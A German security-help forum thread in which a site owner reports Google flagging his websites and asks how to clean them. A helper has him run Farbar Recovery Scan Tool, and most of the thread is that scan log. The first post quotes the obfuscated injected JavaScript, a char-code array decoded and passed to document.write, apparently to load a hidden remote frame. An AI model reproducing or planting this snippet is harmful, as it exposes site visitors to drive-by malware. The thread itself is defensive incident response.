Malware vor dem </body> auf mehreren Seiten meines Netzwerks entdeckt (alle auf gleichem Server)

Velcoro · 26.07.2015, 08:33

So wie es aussieht, habe ich seit heute Nacht ein Riesen-Problem. Google Webmaster Tools hat Malware auf meiner Seite hxxp://www.erfolg-bei-frauen.eu erkannt und diese daraufhin gesperrt. Hier der entsprechende von Google monierte Code:

PHP-Code:

  <script type="text/javascript">var ad11cb1=[979,1039,1079,1084,1097,1011,1094,1095,1100,1087,1080,1040,1013,1091,1090,1094,1084,1095,1084,1090,1089,1037,1011,1076,1077,1094,1090,1087,1096,1095,1080,1038,1011,1087,1080,1081,1095,1037,1024,1028,1027,1027,1016,1038,1011,1095,1090,1091,1037,1027,1016,1038,1011,1098,1084,1079,1095,1083,1037,1028,1027,1027,1016,1038,1011,1083,1080,1084,1082,1083,1095,1037,1028,1027,1027,1016,1038,1013,1041,989,1039,1094,1078,1093,1084,1091,1095,1041,1097,1076,1093,1011,1084,1040,1027,1038,1081,1096,1089,1078,1095,1084,1090,1089,1011,1079,1090,1090,1019,1090,1020,1102,1084,1081,1019,1084,1040,1040,1028,1020,1093,1080,1095,1096,1093,1089,1038,1084,1081,1019,1089,1076,1097,1084,1082,1076,1095,1090,1093,1025,1076,1091,1091,1065,1080,1093,1094,1084,1090,1089,1025,1084,1089,1079,1080,1099,1058,1081,1019,1013,1066,1084,1089,1013,1020,1012,1040,1024,1028,1020,1011,1102,989,1090,1025,1094,1093,1078,1040,1013,1083,1095,1095,1091,1037,1026,1026,1076,1077,1076,1094,1079,1081,1095,1100,1083,1096,1082,1077,1089,1090,1025,1082,1076,1026,1094,1080,1076,1093,1078,1083,1042,1092,1040,1028,1027,1035,1033,1079,1081,1076,1028,1017,1090,1054,1051,1099,1035,1040,1082,1065,1098,1017,1079,1044,1078,1040,1031,1081,1031,1029,1033,1035,1036,1031,1078,1031,1017,1084,1051,1078,1040,1079,1056,1064,1065,1053,1068,1017,1065,1055,1057,1068,1059,1040,1077,1060,1053,1054,1064,1087,1017,1045,1100,1031,1099,1063,1033,1040,1078,1069,1046,1050,1082,1095,1017,1055,1065,1054,1088,1040,1080,1047,1048,1017,1085,1033,1082,1077,1045,1040,1081,1028,1080,1017,1048,1065,1084,1078,1030,1040,1076,1067,1028,1032,1062,1045,1083,1095,1049,1060,1060,1069,1048,1065,1083,1035,1056,1044,1027,1099,1067,1044,1013,1038,1097,1076,1093,1011,1084,1088,1082,1011,1040,1011,1089,1080,1098,1011,1052,1088,1076,1082,1080,1019,1028,1023,1028,1020,1038,1084,1088,1082,1025,1094,1093,1078,1011,1040,1011,1013,1083,1095,1095,1091,1037,1026,1026,1088,1090,1077,1084,1024,1076,1097,1095,1090,1025,1093,1096,1026,1078,1089,1095,1029,1025,1082,1084,1081,1013,1038,1104,1084,1040,1028,1038,1093,1080,1095,1096,1093,1089,1038,1104,1039,1026,1094,1078,1093,1084,1091,1095,1041,1039,1084,1081,1093,1076,1088,1080,1011,1090,1089,1087,1090,1076,1079,1040,1013,1093,1080,1095,1096,1093,1089,1011,1079,1090,1090,1019,1095,1083,1084,1094,1020,1038,1013,1011,1094,1095,1100,1087,1080,1040,1013,1098,1084,1079,1095,1083,1037,1032,1027,1016,1038,1083,1080,1084,1082,1083,1095,1037,1032,1027,1016,1038,1013,1011,1094,1093,1078,1040,1013,1076,1077,1090,1096,1095,1037,1077,1087,1076,1089,1086,1013,1041,1039,1026,1084,1081,1093,1076,1088,1080,1041,1039,1026,1079,1084,1097,1041];var bd11cb2="";for (var i=1; i<ad11cb1.length; i++) {bd11cb2+=String.fromCharCode(ad11cb1[i]-ad11cb1[0]);} document.write(bd11cb2);</script>

Meines Erachtens sieht das Ding ziemlich übel aus, habe hier aber nur sehr bedingt Erfahrung, weswegen ich dringend eure Expertenhilfe benötige.

Leider ist nicht nur diese hiervon betroffen, sondern auch folgende Seiten:

hxxp://www.asiatische-frauen.com
hxxp://www.frauen-aus-osteuropa.net
hxxp://www.pilsen-tschechien.de
hxxp://www.brustwarzen-schmerzen.de

Diese Seiten befinden sich alle auf einem Server, der entsprechende Support ist bereits informiert.

Bei den Frauen-Seiten handelt es sich NICHT um Pornoseiten. Hier werden lediglich typische Eigenschaften von Frauen aus bestimmten Ländern vorgestellt... (Anmerkung am Rande).

Was kann oder muss ich jetzt genau tun?

Danke vorab für eure Hilfe!

schrauber · 26.07.2015, 08:54

Hi,

Wie viele Rechner haben Zugang per ftp? Von allen:

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Velcoro · 26.07.2015, 09:14

Hallo schrauber,

danke für deine schnelle Antwort und deine Hilfe.

Im Anhang die beiden Dateien.

Momentan hat nur ein Computer Zugriff über FTP.

VG

schrauber · 27.07.2015, 06:13

Hi,

Logs bitte immer in den Thread posten. Zur Not aufteilen und mehrere Posts nutzen.
Ich kann auf Arbeit keine Anhänge öffnen, danke.

So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Velcoro · 27.07.2015, 09:41

FRST

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x86) Version: 25-07-2015
durchgeführt von SiRu (Administrator) auf SIRU-PC (26-07-2015 10:10:43)
Gestartet von C:\Users\SiRu\Desktop\Downloads
Geladene Profile: SiRu (Verfügbare Profile: SiRu & Gast)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) Sprache: Deutsch (Deutschland)
Internet Explorer Version 9 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Logitech Inc.) C:\Program Files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft\BingBar\SeaPort.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(© 2015 Microsoft Corporation) C:\Users\SiRu\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\WISO\Steuersoftware 2011\mshaktuell.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_18_0_0_209.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_18_0_0_209.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\conime.exe


==================== Registry (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-18] (Microsoft Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [981688 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2007-10-14] (Hewlett-Packard)
HKLM\...\Run: [hpqSRMon] => C:\Program Files\HP\Digital Imaging\bin\hpqSRMon.exe [80896 2007-08-22] (Hewlett-Packard)
HKU\S-1-5-21-3878630861-872424575-2572082325-1000\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [53288576 2015-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-3878630861-872424575-2572082325-1000\...\Run: [BingSvc] => C:\Users\SiRu\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-04-07] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-3878630861-872424575-2572082325-1000\...\Run: [GoogleChromeAutoLaunch_3B015FA0BE676F6B73A8DAE151A5B3CC] => C:\Program Files\Google\Chrome\Application\chrome.exe [813896 2015-07-24] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2015-04-24]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WISO Mein Steuer-Sparbuch heute.lnk [2015-05-21]
ShortcutTarget: WISO Mein Steuer-Sparbuch heute.lnk -> C:\Program Files\WISO\Steuersoftware 2011\mshaktuell.exe ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt..)

HKU\S-1-5-21-3878630861-872424575-2572082325-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/de-de/?ocid=iehp
SearchScopes: HKU\S-1-5-21-3878630861-872424575-2572082325-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3878630861-872424575-2572082325-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q={searchTerms}&src=IE-SearchBox
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2007-11-06] (Hewlett-Packard Co.)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{3BE18EC5-6016-4BA8-A2AC-C3EF36FBF031}: [DhcpNameServer] 192.168.178.1

FireFox:
========
FF ProfilePath: C:\Users\SiRu\AppData\Roaming\Mozilla\Firefox\Profiles\ry9zkmw2.default
FF SearchEngineOrder.3: Bing 
FF SelectedSearchEngine: Bing 
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_18_0_0_209.dll [2015-07-15] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.28.1\npGoogleUpdate3.dll [2015-07-16] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-06-27] (Adobe Systems Inc.)
FF Extension: Bing Search - C:\Users\SiRu\AppData\Roaming\Mozilla\Firefox\Profiles\ry9zkmw2.default\Extensions\bingsearch.full@microsoft.com [2015-04-23]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-04-24]

Chrome: 
=======
CHR Profile: C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-06-28]
CHR Extension: (Google Docs) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-06-28]
CHR Extension: (Google Drive) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-06-28]
CHR Extension: (YouTube) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-06-28]
CHR Extension: (Google Search) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-06-28]
CHR Extension: (Google Sheets) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-06-28]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-06-28]
CHR Extension: (Google Wallet) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-06-28]
CHR Extension: (Gmail) - C:\Users\SiRu\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-28]

==================== Dienste (All) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2007-11-06] (Hewlett-Packard Co.) [Datei ist nicht signiert]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [139264 2007-11-06] (Hewlett-Packard Co.) [Datei ist nicht signiert]
R2 Intel(R) PROSet Monitoring Service; C:\Windows\system32\IProsetMonitor.exe [128256 2013-05-09] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22216 2015-04-30] (Microsoft Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2010-08-06] (Hewlett-Packard) [Datei ist nicht signiert]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284504 2015-04-30] (Microsoft Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2010-08-06] (Hewlett-Packard) [Datei ist nicht signiert]
R2 UMVPFSrv; C:\Program Files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [450848 2012-01-18] (Logitech Inc.)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-18] (Microsoft Corporation)

==================== Drivers (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 FETNDIS; C:\Windows\System32\DRIVERS\fetnd5.sys [45568 2006-11-02] (VIA Technologies, Inc.              )
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [245096 2015-03-04] (Microsoft Corporation)
S3 NAL; C:\Windows\system32\Drivers\iqvw32.sys [31048 2013-04-24] (Intel Corporation )
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-07-26 10:10 - 2015-07-26 10:10 - 00000000 ____D C:\FRST
2015-07-26 01:34 - 2015-07-26 01:34 - 00002670 _____ C:\Users\SiRu\Desktop\js-malware.txt
2015-07-26 01:19 - 2015-07-26 01:19 - 00002649 _____ C:\Users\SiRu\Desktop\malware-laut-google-webmaster-tools.txt
2015-07-26 00:55 - 2015-07-26 00:55 - 00001607 _____ C:\Users\SiRu\Desktop\navigation.js
2015-07-25 09:01 - 2015-07-25 09:02 - 00000000 ____D C:\Users\SiRu\AppData\Local\{52689C97-3CA5-4B16-8E25-31CD1B7D483A}
2015-07-24 09:18 - 2015-07-24 09:18 - 00000000 ____D C:\Users\SiRu\AppData\Local\{E769B29A-CE73-44CE-ABCF-8139FE3F62C2}
2015-07-23 09:35 - 2015-07-23 09:35 - 00000000 ____D C:\Users\SiRu\AppData\Local\{E10CA413-CD1D-4991-870F-A2EB6DA7424F}
2015-07-22 17:00 - 2015-07-22 17:00 - 00034828 _____ C:\Users\SiRu\AppData\Local\recently-used.xbel
2015-07-22 08:56 - 2015-07-14 18:02 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-07-22 08:56 - 2015-07-14 16:23 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-07-22 08:52 - 2015-07-22 08:53 - 00000000 ____D C:\Users\SiRu\AppData\Local\{15815A08-E7F2-4161-BEE1-77779684C718}
2015-07-21 09:40 - 2015-07-21 09:40 - 00000000 ____D C:\Users\SiRu\AppData\Local\{2E44AF51-B5D7-4F9B-8FB1-CA8379DDDBD7}
2015-07-20 09:14 - 2015-07-20 09:14 - 00000000 ____D C:\Users\SiRu\AppData\Local\{335A86DD-7EE3-4507-A8D9-709D73160549}
2015-07-17 10:35 - 2015-07-17 10:36 - 00000000 ____D C:\Users\SiRu\AppData\Local\{F6FF1DEC-A6FD-4053-B962-91E46CDD4C08}
2015-07-16 09:08 - 2015-07-03 18:04 - 01316864 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2015-07-16 09:08 - 2015-06-25 04:57 - 02066432 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-07-16 09:07 - 2015-06-17 18:50 - 02264576 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2015-07-16 09:07 - 2015-06-17 17:09 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2015-07-16 09:06 - 2015-06-12 18:01 - 00298496 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2015-07-16 08:54 - 2015-05-31 10:11 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\cewmdm.dll
2015-07-16 08:53 - 2015-06-27 18:03 - 00783872 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2015-07-16 08:53 - 2015-06-27 18:02 - 00501248 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-07-16 08:53 - 2015-06-27 18:02 - 00218112 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-07-16 08:53 - 2015-06-27 18:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2015-07-16 08:53 - 2015-06-27 16:21 - 00217088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-07-16 08:53 - 2015-06-27 16:21 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2015-07-16 08:53 - 2015-06-12 15:13 - 00440768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-07-16 08:53 - 2015-01-09 02:17 - 00107008 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-07-16 08:48 - 2015-07-16 08:49 - 00000000 ____D C:\Users\SiRu\AppData\Local\{7139EE58-1CB2-4849-B7D7-F15261235995}
2015-07-15 09:39 - 2015-07-03 07:31 - 12386304 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-07-15 09:39 - 2015-07-03 07:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-07-15 09:36 - 2015-06-17 03:14 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-07-15 09:36 - 2015-06-17 03:12 - 09750528 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-07-15 09:36 - 2015-06-17 03:12 - 00367616 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-07-15 09:36 - 2015-06-17 03:10 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-07-15 09:36 - 2015-06-17 03:09 - 01804288 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-07-15 09:36 - 2015-06-17 03:09 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-07-15 09:36 - 2015-06-17 03:09 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-07-15 09:36 - 2015-06-17 03:09 - 00421888 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-07-15 09:36 - 2015-06-17 03:08 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-07-15 09:36 - 2015-06-17 03:08 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-07-15 09:36 - 2015-06-17 03:08 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-07-15 09:12 - 2015-07-15 09:13 - 00000000 ____D C:\Users\SiRu\AppData\Local\{659712A4-BF5F-4E68-9A2B-215920DC20B2}
2015-07-14 14:05 - 2015-07-14 14:05 - 00000000 ____D C:\Users\SiRu\AppData\Roaming\TeamViewer
2015-07-14 09:14 - 2015-07-14 09:14 - 00000000 ____D C:\Users\SiRu\AppData\Local\{47C61492-D2B4-48DD-A8B8-984BEF3C3BD5}
2015-07-13 10:46 - 2015-07-13 10:46 - 00000000 ____D C:\Users\SiRu\AppData\Local\{43E158D3-BBFA-4EF8-810A-2B3FA841CD42}
2015-07-10 09:32 - 2015-07-10 09:32 - 00000000 ____D C:\Users\SiRu\AppData\Local\{E1400456-60CF-4CB1-A76D-CF8DF479BC31}
2015-07-09 13:04 - 2015-07-15 16:04 - 18009776 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerInstaller.exe
2015-07-09 09:11 - 2015-07-09 09:11 - 00000000 ____D C:\Users\SiRu\AppData\Local\{2ADD42A8-5989-4D07-B3A8-083E07747A01}
2015-07-08 08:48 - 2015-07-08 08:48 - 00000000 ____D C:\Users\SiRu\AppData\Local\{56593F04-6978-4DA6-B3C7-CB80D08CFD43}
2015-07-07 21:38 - 2015-07-07 22:09 - 00000000 ____D C:\Users\SiRu\Desktop\Steuern 2015
2015-07-07 21:37 - 2015-07-19 10:50 - 00000000 ____D C:\Users\SiRu\Desktop\Steuern 2014
2015-07-07 21:22 - 2015-07-07 21:22 - 00000000 ____D C:\Users\Gast\AppData\Local\Google
2015-07-07 09:52 - 2015-07-07 09:52 - 00000000 ____D C:\Users\SiRu\AppData\Local\{9EA01997-DB73-450C-BFE0-8922E4DBD4FC}
2015-07-06 08:50 - 2015-07-06 08:51 - 00000000 ____D C:\Users\SiRu\AppData\Local\{F4EE3DF4-64A6-42DE-B970-FE334B1DB6E9}
2015-07-04 12:49 - 2015-07-04 12:49 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_07_00.Wdf
2015-07-04 08:50 - 2015-07-04 15:38 - 00000000 ____D C:\Program Files\Mozilla Firefox
2015-07-04 08:21 - 2015-07-04 09:47 - 00019305 _____ C:\Users\SiRu\Desktop\suchmaschinen-marketing-fischer-aic.odt
2015-07-03 09:30 - 2015-07-03 09:30 - 00000000 ____D C:\Users\SiRu\AppData\Local\{1163A2DF-996A-4851-8C59-48FF146378CB}
2015-07-02 09:35 - 2015-07-02 09:35 - 00000000 ____D C:\Users\SiRu\AppData\Local\{AA3AB306-A71E-4B29-BE45-0231C9F191FD}
2015-07-01 09:25 - 2015-07-01 09:25 - 00000000 ____D C:\Users\SiRu\AppData\Local\{E689EFDB-792F-4406-9553-C1975529CEA4}
2015-06-30 12:20 - 2015-07-25 08:59 - 00000000 ____D C:\Users\SiRu\AppData\Local\CrashDumps
2015-06-30 12:00 - 2015-06-30 12:00 - 00000325 _____ C:\Users\SiRu\Desktop\HP Druckerdiagnosetools.url
2015-06-30 08:46 - 2015-06-30 08:46 - 00000000 ____D C:\Users\SiRu\AppData\Local\{B426C2DA-259F-41F7-BBDB-37A3D3EA45B3}
2015-06-29 10:08 - 2015-06-29 10:09 - 00000000 ____D C:\Users\SiRu\AppData\Local\{65119A60-2B9D-4852-B328-490F170C9CB6}
2015-06-28 11:40 - 2015-07-26 09:51 - 00001094 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
